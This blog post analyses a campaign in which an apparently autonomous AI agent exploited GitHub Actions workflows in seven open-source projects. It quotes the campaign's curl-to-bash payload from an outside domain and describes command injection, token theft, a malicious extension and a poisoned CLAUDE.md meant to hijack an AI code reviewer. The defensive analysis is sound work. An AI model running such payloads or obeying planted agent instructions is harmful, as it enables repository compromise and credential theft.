
poush

Originally published at orchesis.ai

An AI agent compromised 7 open-source repos in one week. The only defense that worked was another AI.

Between February 20 and 28, an autonomous AI agent called hackerbot-claw systematically exploited GitHub Actions workflows across seven major open-source projects. It hit Microsoft. It hit DataDog. It hit a CNCF project.

And then it fully compromised Aqua Security's Trivy — the most widely used vulnerability scanner on GitHub, with 32,000 stars and over 100 million annual downloads.

A security scanner got owned by a bot exploiting the exact class of misconfiguration the scanner was built to find. That's where we are.

I've been building runtime security tooling for AI agents, so when StepSecurity published their full analysis of the campaign, I spent a few days tracing through every attack vector. What follows is a reconstruction of how the bot worked, what it exploited, and what the seven targets had in common.


What hackerbot-claw actually is

The GitHub account was created on February 20, 2026. Its profile described it as an "autonomous security research agent powered by claude-opus-4-5" and solicited cryptocurrency donations to "fund more scans." According to StepSecurity's analysis, the profile claimed 47,391 repositories already scanned.

The bot loaded what it called a "vulnerability pattern index" with 9 classes and 47 sub-patterns, then autonomously scanned for matches, verified them, and dropped proof-of-concept exploits.

Every successful attack delivered the same payload:

curl -sSfL hackmoltrepeat.com/molt | bash

But the exploitation technique varied: five different approaches across seven repos, each customized to the target's workflow configuration.

That domain, hackmoltrepeat.com, was registered on February 24 through Tucows and hidden behind Cloudflare nameservers: four days after the account was created and four days before the campaign was publicly discovered.


What it hit

awesome-go (140,000+ stars)

The bot injected a Go init() function into a quality check script. In Go, init() runs automatically before main(), so the malicious code executed before any legitimate checks could catch it. The bot stole a GITHUB_TOKEN with write permissions and exfiltrated it to its server.

Microsoft ai-discovery-agent

Branch name injection. The bot created a branch whose name contained shell syntax. When the workflow echoed the branch ref into a file using unescaped interpolation, Bash evaluated the embedded command substitution and ran the remote payload.
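A minimal Python sketch of why this works, assuming a step shaped like echo "${{ github.head_ref }}" (the exact line in Microsoft's workflow isn't given here). The runner substitutes the expression into the script text before bash parses it, so whatever the branch name contains becomes code. The helpers render_expression and run_bash are hypothetical, the printf is a harmless stand-in for the real payload, and running it requires bash on the PATH.

```python
import os
import subprocess
from typing import Optional

# Hypothetical attacker branch name. Git ref names cannot contain spaces, so
# ${IFS} stands in for one; a harmless printf replaces the real curl | bash payload.
MALICIOUS_REF = "feature-$(printf${IFS}INJECTED)"


def render_expression(script: str, head_ref: str) -> str:
    """Simplified model of the runner substituting ${{ github.head_ref }}
    into the step's script text before bash parses it."""
    return script.replace("${{ github.head_ref }}", head_ref)


def run_bash(script: str, env: Optional[dict] = None) -> str:
    """Run a script with bash -c and return its trimmed stdout."""
    result = subprocess.run(
        ["bash", "-c", script],
        capture_output=True,
        text=True,
        env={**os.environ, **(env or {})},
        check=True,
    )
    return result.stdout.strip()


# Vulnerable: the branch name becomes part of the script, so bash runs $(...)
vulnerable_script = render_expression('echo "${{ github.head_ref }}"', MALICIOUS_REF)
print(run_bash(vulnerable_script))  # prints: feature-INJECTED

# Safer: pass the value through an environment variable; bash expands $BRANCH
# but does not re-parse the expanded text as code
safe_script = 'printf "%s\\n" "$BRANCH"'
print(run_bash(safe_script, env={"BRANCH": MALICIOUS_REF}))  # prints the name literally
```

The second call mirrors the commonly recommended fix: hand the value to the step through an env: entry and reference it as a shell variable, so it is only ever treated as data.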

DataDog datadog-iac-scanner

Filename injection through the CI pipeline. DataDog responded within 9 hours, adding author_association checks and tightening permissions.

Aqua Security Trivy (32,000+ stars)

This was the worst one.

The bot exploited a pull_request_target workflow called "API Diff Check" to steal a Personal Access Token with broad repository permissions. Within 45 minutes of the initial PR, the stolen PAT was used to:

  • Delete all 178 GitHub releases
  • Wipe the repository
  • Push a malicious VSCode extension (CVE-2026-28353) to the OpenVSX marketplace under Trivy's trusted publisher identity

The extension contained code designed to use local AI coding agents to collect and exfiltrate sensitive information from anyone who installed it.

From first PR to full compromise: 30 minutes.
From compromise to malicious extension published: 15 more.

project-akri (CNCF)

CI executed injected scripts through a similar workflow misconfiguration.

RustPython (20,000+ stars)

Remote code execution achieved through CI.

ambient-code/platform

This one is the most interesting.

The bot replaced the repository's CLAUDE.md file with social engineering instructions designed to trick Claude Code (integrated as an AI code reviewer in CI) into vandalizing the README, committing unauthorized changes, and posting fake "approved" reviews.

Claude Code caught it. It classified the attempt as a "textbook AI agent supply-chain attack via poisoned project-level instructions" and refused to execute. This was the only target where the defense held.
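Rather than relying on the reviewing model to refuse, as Claude Code did here, a workflow can decline to give an AI reviewer instructions that an untrusted PR rewrote. A minimal sketch, assuming the workflow already has the PR's changed file list and the author's author_association value. The file list is illustrative, not exhaustive (CLAUDE.md is the file from this attack; AGENTS.md is an assumption), and the function names are hypothetical.

```python
from pathlib import PurePosixPath

# Illustrative, not exhaustive: files an AI reviewer may treat as instructions.
# CLAUDE.md comes from the ambient-code attack; AGENTS.md is an assumption.
AGENT_INSTRUCTION_FILES = frozenset({"CLAUDE.md", "AGENTS.md"})

# Assumption: which GitHub author_association values count as trusted.
TRUSTED_ASSOCIATIONS = frozenset({"OWNER", "MEMBER", "COLLABORATOR"})


def instruction_files_touched(changed_files: list) -> list:
    """Return changed paths whose file name matches a known instruction file,
    at any directory depth."""
    return [p for p in changed_files if PurePosixPath(p).name in AGENT_INSTRUCTION_FILES]


def needs_human_review(changed_files: list, author_association: str) -> bool:
    """Hold the AI review step when an untrusted author edits instruction files."""
    touched = instruction_files_touched(changed_files)
    return bool(touched) and author_association not in TRUSTED_ASSOCIATIONS


print(instruction_files_touched(["README.md", "CLAUDE.md", "docs/CLAUDE.md"]))
print(needs_human_review(["CLAUDE.md"], "FIRST_TIME_CONTRIBUTOR"))   # True
print(needs_human_review(["src/main.rs"], "FIRST_TIME_CONTRIBUTOR"))  # False
```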


Same root cause, every time

The root cause across all seven targets was the same: pull_request_target workflows configured to check out code from untrusted forks while running with elevated permissions.

pull_request_target runs with the base repository's secrets and permissions. If the workflow also checks out the PR head — attacker-controlled fork code — it hands that code the same elevated access. The GitHub documentation warns about this. Security researchers have been writing about it for years.

But it keeps happening because the insecure version is easier to set up. A workflow triggered by pull_request from a fork can't access repository secrets, and its GITHUB_TOKEN is read-only. That's annoying. So developers switch to pull_request_target and check out the fork code, and now untrusted code runs with trusted permissions.
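The pattern is mechanical enough to check for. Below is a heuristic sketch that takes an already-parsed workflow (for example, the output of PyYAML's safe_load) and flags jobs in a pull_request_target workflow whose actions/checkout step checks out the PR head. The function names and the list of expressions are assumptions, and it will miss other ways of fetching fork code, such as a git fetch inside a run step.

```python
from typing import Any

# Expressions that resolve to the attacker-controlled PR head (heuristic list)
UNTRUSTED_REFS = (
    "github.event.pull_request.head.sha",
    "github.event.pull_request.head.ref",
    "github.head_ref",
)


def triggers(workflow: dict) -> set:
    """Return the event names a parsed workflow listens to."""
    # PyYAML follows YAML 1.1 and loads the bare key `on` as boolean True
    on: Any = workflow.get("on", workflow.get(True, []))
    if isinstance(on, str):
        return {on}
    return set(on or [])  # a list of events, or a dict keyed by event name


def risky_jobs(workflow: dict) -> list:
    """Jobs in a pull_request_target workflow that check out the PR head."""
    if "pull_request_target" not in triggers(workflow):
        return []
    flagged = []
    for name, job in workflow.get("jobs", {}).items():
        for step in job.get("steps", []):
            ref = str((step.get("with") or {}).get("ref", ""))
            if step.get("uses", "").startswith("actions/checkout") and any(
                expr in ref for expr in UNTRUSTED_REFS
            ):
                flagged.append(name)
                break
    return flagged


# Hypothetical workflow following the insecure pattern described above
example = {
    "on": {"pull_request_target": {"types": ["opened", "synchronize"]}},
    "jobs": {
        "api-diff": {
            "runs-on": "ubuntu-latest",
            "steps": [
                {"uses": "actions/checkout@v4",
                 "with": {"ref": "${{ github.event.pull_request.head.sha }}"}},
                {"run": "make api-diff"},
            ],
        }
    },
}
print(risky_jobs(example))  # ['api-diff']
```

The True lookup matters in practice: under YAML 1.1 rules, PyYAML loads a bare on key as the boolean True rather than the string "on".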

Sound familiar? This is the same pattern we found when we scanned 900 MCP configurations on GitHub. Developers pick the path that works, not the path that's safe.


What made this different

The tj-actions/changed-files compromise in March 2025 (CVE-2025-30066) affected 23,000 repositories. CISA issued a formal alert.

hackerbot-claw was different in three ways.

It was adaptive. Five different approaches across seven targets, each customized to the specific workflow. The bot analyzed each target and picked the right vector.

It escalated beyond code execution. In Trivy's case, the bot went from CI access to publishing a malicious extension under a trusted identity. Anyone who installed that extension would have their AI coding agents turned into credential collectors.

It attempted AI-on-AI manipulation. The ambient-code attack was the first publicly documented case of an AI agent trying to prompt-inject another AI agent through CI/CD infrastructure. That it failed is good news. That it was attempted at all tells you where this is going.

Pillar Security called the campaign "Chaos Agent" and confirmed the agent most likely operated autonomously across the entire kill chain.


The 45-minute timeline

The bot opens a pull request. The pull_request_target workflow triggers and checks out the fork code. The attacker's code runs with access to repository secrets.

Within minutes, the bot has a PAT with write permissions. It pushes commits, renames the repository, wipes all 178 historical releases, and starts publishing a malicious VSCode extension to OpenVSX.

Total time from first PR to published malicious extension: ~45 minutes.
Total time for maintainers to respond and clean up: ~48 hours.

That asymmetry is the thing I keep coming back to.


What this has to do with your MCP configs

So far this reads like a CI/CD story. But the connection to the broader agent ecosystem is direct.

When we scanned 900 MCP configurations on GitHub, we found that 75% had security problems. The most common: 43.6% of configs reference packages without specifying a version, so npx -y silently installs whatever version is latest.

hackerbot-claw shows what happens at the other end of that pipeline. The bot didn't need to poison an MCP server. It went after the CI/CD layer where those packages get built and published. One misconfigured workflow, one stolen token, and suddenly the trusted publisher is shipping malware.

Version pinning protects you from a compromised package update. It doesn't help if the package gets republished by an attacker using a stolen maintainer token. That requires a different layer of defense.
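The pinning half of that advice is easy to check locally. A minimal sketch, assuming the common mcpServers layout in which each server has a command and an args list. It treats only an exact x.y.z version as pinned, so ranges like ^1.2.0 and dist-tags like latest are flagged. The package names are hypothetical, and the argument handling is simplified (npx flags that take a separate value would confuse it).

```python
import json
import re
from typing import Optional

# Exact versions only: "1.4.2" or "1.4.2-beta.1". Ranges and dist-tags float.
EXACT_VERSION = re.compile(r"\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?")


def package_spec(args: list) -> Optional[str]:
    """Return the first argument to npx that is not a flag (the package spec)."""
    for arg in args:
        if not arg.startswith("-"):
            return arg
    return None


def is_pinned(spec: str) -> bool:
    # Drop a leading scope "@" so "@scope/name" is not mistaken for name@version
    body = spec[1:] if spec.startswith("@") else spec
    if "@" not in body:
        return False
    version = body.rsplit("@", 1)[1]
    return EXACT_VERSION.fullmatch(version) is not None


def unpinned_servers(config: dict) -> list:
    """Names of npx-launched MCP servers whose package has no exact version."""
    flagged = []
    for name, server in config.get("mcpServers", {}).items():
        if server.get("command") != "npx":
            continue
        spec = package_spec(server.get("args", []))
        if spec is not None and not is_pinned(spec):
            flagged.append(name)
    return flagged


config = json.loads("""
{
  "mcpServers": {
    "files":  {"command": "npx", "args": ["-y", "@example/mcp-files"]},
    "search": {"command": "npx", "args": ["-y", "@example/mcp-search@1.4.2"]},
    "latest": {"command": "npx", "args": ["-y", "example-mcp@latest"]}
  }
}
""")
print(unpinned_servers(config))  # ['files', 'latest']
```

As the paragraph above notes, this only covers the pinning layer; it says nothing about whether the pinned version was published by the legitimate maintainer.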


What DataDog did right

Within 9 hours of the attack, DataDog had deployed fixes:

  • Added author_association checks before triggering workflows
  • Tightened token permissions to contents: read
  • Hardened path handling in the affected script

Nine hours. That's fast. I looked into whether other targets responded as quickly and couldn't find public timelines for most of them. But DataDog has a dedicated security team. Most open-source projects don't.
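DataDog's first two fixes can be modeled in a few lines. This sketch assumes OWNER, MEMBER and COLLABORATOR are the trusted associations (the exact set DataDog chose isn't stated) and reads the value a workflow sees as github.event.pull_request.author_association. write_scopes inspects only the top-level permissions block of a parsed workflow. Both function names are hypothetical.

```python
# Assumption: which author_association values count as trusted. GitHub also
# reports CONTRIBUTOR, FIRST_TIME_CONTRIBUTOR, FIRST_TIMER, MANNEQUIN and NONE.
TRUSTED_ASSOCIATIONS = frozenset({"OWNER", "MEMBER", "COLLABORATOR"})


def should_run_privileged(event: dict) -> bool:
    """Gate on the PR author's association, read from the event payload."""
    pr = event.get("pull_request") or {}
    return pr.get("author_association") in TRUSTED_ASSOCIATIONS


def write_scopes(workflow: dict) -> list:
    """List token scopes a workflow grants write access to (top level only)."""
    perms = workflow.get("permissions")
    if perms is None:
        # No block: the token gets the repository or organization default
        return ["<unset>"]
    if perms == "write-all":
        return ["write-all"]
    if isinstance(perms, str):  # "read-all"
        return []
    return sorted(scope for scope, level in perms.items() if level == "write")


print(should_run_privileged({"pull_request": {"author_association": "NONE"}}))  # False
print(write_scopes({"permissions": {"contents": "read"}}))                       # []
```

In a real workflow the gate would be an if: condition on the privileged job and the permissions a YAML block; the Python only makes the decision logic explicit.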


Where this leaves us

hackerbot-claw claimed to have scanned 47,391 repositories. It found exploitable workflows in at least seven and achieved code execution in five. The account has been removed by GitHub, but the techniques are documented and the vulnerability patterns are public.

The OpenSSF published a TLP:CLEAR advisory. DataDog's State of DevSecOps 2026 report now cites the campaign. OWASP published their MCP Top 10, addressing several of the same vulnerability classes.

If you maintain a public repository with GitHub Actions: check your pull_request_target workflows.

If you use MCP servers: check whether your configs pin versions and scope permissions.

If you publish to npm, PyPI, or extension marketplaces: check what tokens your CI has access to.

The scanner we built for MCP configs catches the same class of issues that enabled these attacks. orchesis.io/scan — runs in your browser, 52 checks, nothing sent anywhere.

Full write-up on the MCP scan results: orchesis.io/blog/mcp-scan
